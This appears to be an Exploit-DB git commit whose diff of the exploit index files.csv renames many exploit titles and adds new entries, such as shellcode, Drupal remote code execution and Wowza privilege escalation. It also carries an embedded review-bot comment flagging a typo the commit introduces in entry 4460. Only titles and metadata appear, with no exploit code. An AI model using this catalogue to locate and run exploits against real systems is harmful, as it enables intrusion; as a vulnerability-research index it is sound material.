DB: 2016-07-21

10 new exploits

Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass
Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass

Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit

Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit
Simplog 0.9.3 - (tid) SQL Injection
Skulltag <= 0.96f - (Version String) Remote Format String PoC
OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit
Skulltag 0.96f - (Version String) Remote Format String PoC
OpenTTD 0.4.7 - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)
Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include
Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit
Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion
phpMyAgenda 3.0 Final - (rootagenda) Remote Include
Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion

X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit
X7 Chat 2.0 - (help_file) Remote Command Execution

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
Auction 1.3m - (phpbb_root_path) Remote File Inclusion
acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit
acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit

AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit
AWStats 6.5 - (migrate) Remote Shell Command Injection

acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit
acFTP FTP Server 1.4 - (USER) Remote Denial of Service
PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities
Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit
ACal <= 2.2.6 - (day.php) Remote File Inclusion
EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion
PHP-Fusion 6.00.306 - Multiple Vulnerabilities
Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion
ACal 2.2.6 - (day.php) Remote File Inclusion
EQdkp 1.3.0 - (dbal.php) Remote File Inclusion

Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service
Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service

Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit
Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)

Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit
Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit

\o - Local File Inclusion (1st)
Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)

PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept
Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept

Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Django CMS 3.3.0 - (Editor Snippet) Persistent XSS
Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Wowza Streaming Engine 4.5.0 - Local Privilege Escalation
Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation
Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF
Wowza Streaming Engine 4.5.0 - Multiple XSS
OpenSSHD <= 7.2p2 - Username Enumeration
WordPress Video Player Plugin 1.5.16 - SQL Injection
Offensive Security 2016-07-21 05:06:28 +00:00
parent 965b4bba8f
commit ec03ab428f
11 changed files with 1215 additions and 32 deletions


@ -557,7 +557,7 @@ id,file,description,date,author,platform,type,port
715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0
716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513
718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0
720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0
721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0
725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0
@ -1419,23 +1419,23 @@ id,file,description,date,author,platform,type,port
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0
1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0
1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0
1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0
1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0
1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0
1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0
1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0
1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0
1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0
1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0
1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0
1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0
1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0
1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0
1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0
1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0
@ -1450,11 +1450,11 @@ id,file,description,date,author,platform,type,port
1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0
1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0
1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0
1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0
1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0
1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0
1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0
1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0
1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0
1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0
1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306
@ -1462,23 +1462,23 @@ id,file,description,date,author,platform,type,port
1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0
1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0
1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0
1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0
1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0
1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0
1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0
1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0
1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0
1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0
1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0
1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0
1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0
1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0
1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0
1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0
1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0
1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0
1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0
1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0
1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0
1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0
1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0
1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0
1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0
1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0
1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0
@ -1487,9 +1487,9 @@ id,file,description,date,author,platform,type,port
1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0
1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0
1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0
1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0
1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203
1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0
1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0
1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0
1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0
1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0
@ -1710,16 +1710,16 @@ id,file,description,date,author,platform,type,port
2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0
2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0
2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0
2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0
2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0
2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0
2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515
2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0
@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port
4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0
4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0
4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0
4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
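Review bot: the new title for 4460 drops the opening parenthesis: `Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit` has an unmatched `)`. It should read `Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit`, keeping the pair as in the removed line; the same typo is repeated in the commit message.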
@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0
5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
@ -8685,7 +8685,7 @@ id,file,description,date,author,platform,type,port
9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0
9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0
9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0
9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0
@ -18028,7 +18028,7 @@ id,file,description,date,author,platform,type,port
20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal",2001-03-23,"Erik Tayler",windows,remote,0
20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting",2001-03-18,lesha,unix,local,0
20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure",2001-03-28,"Sverre H. Huseby",multiple,remote,0
20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0
20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0
@ -36284,3 +36284,13 @@ id,file,description,date,author,platform,type,port
40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0
40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
